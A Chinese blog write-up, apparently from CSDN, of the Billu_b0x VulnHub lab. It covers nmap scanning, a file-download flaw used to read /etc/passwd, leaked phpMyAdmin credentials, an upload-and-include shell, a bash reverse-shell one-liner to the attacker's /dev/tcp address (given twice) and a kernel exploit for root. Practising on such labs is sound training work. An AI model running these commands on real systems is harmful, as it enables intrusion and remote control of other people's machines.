Billu_b0x靶场复现

最新推荐文章于 2024-09-04 17:26:02 发布
最新推荐文章于 2024-09-04 17:26:02 发布
阅读量534 收藏 1
点赞数
分类专栏: 靶场复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46369125/article/details/124492138
版权

Billu_b0x靶场复现

环境准备:
Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址

kali linux 2020虚拟机,ip地址192.168.120.133
kali linux 2020虚拟机,ip地址192.168.120.141

1.信息收集

nmap -sP 192.168.1.0/24

使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141

主机发现:nmap -sP 192.168.120.0/24

在这里插入图片描述
2.端口及服务扫描
使用nmap进行端口和服务扫描,指定1-65535全端口,并添加参数A做服务识别和深度扫描

nmap -p1-65535 -A 192.168.120.141

在这里插入图片描述
从上图中可以看到,靶机是一台ubuntu,开启http服务,访问上去看一下
在这里插入图片描述

使用御剑扫描文件
在这里插入图片描述
得到页面较多,head.Php test.php、in.php、c.php、index.php、show.php等
3.漏洞挖掘
访问test.php:页面提示file参数为空,需要提供file参数
在这里插入图片描述
这里存在文件下载漏洞:下载passwd文件和c.php文件
在这里插入图片描述
在这里插入图片描述
Passwd存在一些用户:games,deamon,gnats,ica
查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root
在这里插入图片描述
并且c.php文件中存在数据库连接配置信息(http://192.168.120.141/phpmy/)
在这里插入图片描述
Image目录
在这里插入图片描述
通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面,登录后查看web用户名密码:biLLu hEx_it
在这里插入图片描述
进入网站
在这里插入图片描述
在添加用户处存在上传点,尝试文件上传获取shell,可能存在
文件包含漏洞(失败)
在这里插入图片描述
在这里插入图片描述
在show—user中复制图片url:http://192.168.120.141/uploaded_images/a.jpg,
在这里插入图片描述

将bash先进行base64后面url编码

echo "bash -i >& /dev/tcp/192.168.20.133/4444 0>&1" | bash

在这里插入图片描述
在kali开启尝试反弹shell
在这里插入图片描述
反弹成功
在这里插入图片描述
.将bash先进行base64后面url编码

echo "bash -i >& /dev/tcp/192.168.20.133/4444 0>&1" | bash

在这里插入图片描述
反弹shell成功
在这里插入图片描述
查看内核版本和当前权限
在这里插入图片描述
查找exp:searchsploit -s linux kernel 3.13.0
在这里插入图片描述
查找exp路径并且复制到/root目录下
在这里插入图片描述
开启http服务进行远程下载
在这里插入图片描述
下载完成在/tmp目录下
在这里插入图片描述
然后gcc编译执行后,提权成功
在这里插入图片描述

苏同学的安全屋
关注
专栏目录
billu b0x靶场的渗透测试
L_lemo004的博客
07-12 816
扫描IP 由于我的内网网段为31,所以我使用ipscan工具扫描31段的存活主机 发现192.168.31.16疑似靶场IP,访问看看,成功访问,界面是白胡子 页面提示我们用SQL注入获取用户名密码,在输入框尝试注入,输入admin’ ,弹出try again提示框,说明无法注入 文件包含 无法注入,我们可以尝试爆破目录看看有没有什么突破点 得到页面较多,test.php、add.php、...
billu_b0x靶场通关
tpaer的博客
03-03 820
billu_box靶场通关
【VulnHub】billu_b0x靶场复盘
redwand的博客
01-21 4667
此题目主要训练三方面要点,一是post方法下的文件包含,二是post方法下的getshell,三是[CVE-2015-1328]的利用。很多细节不错,值得入手一练。
靶场实战——Billu
最新发布
weixin_58666006的博客
09-04 1087
代码审计入侵
VulnHub靶场Billu_b0x
M_onster_d的博客
09-10 690
VulnHub靶场Billu_b0x 靶机下载地址 [https://download.vulnhub.com/billu/Billu_b0x.zip] 虚拟机配置 下载的虚拟机是 ova 格式,当然装载到 virtualbox 上最好,也可以装载到vmware workstation上,本人电脑上是workstation,所以装载到workstation上。 打开虚拟机的过程中,可以会出现 “未通过 OVF 规范一致性” 的版本问题,此时需要重新下载 ovftool 工具(忘了从哪下载了…但是网上可
Vulnhub Billu_b0x靶机
Alexhirchi的博客
02-07 880
Vulnhub Billu_b0x靶机 中等难度靶机,以web渗透模板为主 说明 靶场下载地址:https://www.vulnhub.com/entry/billu-b0x,188/ 渗透靶机:VMware 攻击靶机:本地机+kail(VMware) Flag:获取 root 权限 启动 Billu_b0x 靶机,界面显示登录界面,这是正常运行情况,我们也并没有登录账号,需要自己去渗透测试进行提权。回到我们的攻击机 文章目录Vulnhub Billu_b0x靶机说明信息收集发现IP扫描端口漏洞挖掘测试
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 4117
CTF综合靶场渗透系列-Billu_b0x
VnlnHub Billu_b0x
weixin_45682839的博客
10-09 466
涉及知识包括:端口服务探测、敏感目录收集、SQL注入、文件上传漏洞、任意文件包含漏洞、linux本地提权、任意文件下载漏洞、敏感信息收集等。
Billu_b0x的渗透测试
Cper的博客
10-26 633
靶场的测试实践和不同思路
靶场渗透(一)——billu_b0x渗透
Ramona的博客
07-29 1158
测试环境 靶机billu_b0x 打开虚拟机后设为nat模式 攻击机:kali 信息收集 • 获取靶机ip kali: nmap -sP 192.168.111.1/24(ip段根据实际情况自己更改) 获取到的信息:ip192.168.111.128 • 扫描开启的端口 kali: nmap -p1-65535 -A 192.168.111.128 获取到的信息:开放端口22...
靶机扫描(七)Billu_b0x
qq_42180996的博客
04-30 2582
靶机Billu_b0x 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.尝试SQL注入(失败) 3.目录扫描(dirb) 4.访问/add 5.访问/in ...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
vlunhub系列之Billu_b0x靶机
hanjinming110的博客
03-08 276
Billu_b0x靶机
Vulnhub靶场渗透-Billu_b0x
m0_62399876的博客
08-13 1435
vulnhub靶场详细渗透-Billu_b0x,运用了文件上传+文件包含漏洞,图片马的使用,以及工具linux-exploit-suggester的使用
VulnHub渗透测试实战靶场 - Billu_b0x
LYJ20010728的博客
08-04 2241
VulnHub渗透测试实战靶场 - Billu_b0x环境下载Billu_b0x靶机搭建渗透测试信息搜集漏洞挖掘getshell获得root权限获得非root权限提权 环境下载 戳此进行环境下载 Billu_b0x靶机搭建 将下载好的靶机环境,用VMware导入,将靶机和攻击机的网络连接设置为NAT模式 渗透测试 信息搜集 用Kali中的arp扫描探测一下:sudo arp-scan -l 使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP
VulnHub 靶场实战~Billu_b0x
m0_75030189的博客
02-26 1159
billu_b0x靶场难度:适中;感觉很多东西还没掌握,后期继续完善!
Billu_box靶场实战演练
weixin_52049485的博客
01-05 682
部署环境 虚拟机:Kali ip:192.168.202.138 靶机Billu_box ip:192.168.202.140 信息收集 1、通过nmap扫描发现靶机 ip地址:192.168.202.140 开放了22、80端口 中间件:Apache/2.2.22 (Ubuntu) 操作系统:Linux 2、通过Kali自带的DIRB工具+字典扫描目录 漏洞发现 通过目录扫描发现了phpinfo** phpmyadmin界面,注意的是扫描目录为“phpmy” 发现“file”内容的网址,发现任意
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1460
test。
靶机渗透(二)——Billu_b0x
qq_45751902的博客
04-18 2080
一、环境配置 kali:192.168.92.5 nat模式 靶机:192.168.92.3 nat模式 二、信息收集 1.扫描ip nmap -sP 192.168.92.0/24 2.端口扫描 半开扫描:nmap -sS 192.168.92.3 全开扫描:nmap -sT 192.168.92.3 3个过程全部完成叫全开扫描,最后一步不做,叫半开扫描。在实际过程中,半开扫描应用的最多,半开扫描不容易被目标电脑日志记录。 3.目录扫描 dirb http://192.168.92.3
入门靶场Billu_b0x:Web渗透学习与实践
"Billu_b0x靶机练习是一个适合初学者的Web渗透入门实践,旨在帮助用户了解基本的Web渗透流程。通过该靶场,用户可以锻炼自己的技能,包括主机发现、端口扫描和信息收集等。文章作者作为小白,分享了其学习过程中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏同学的安全屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值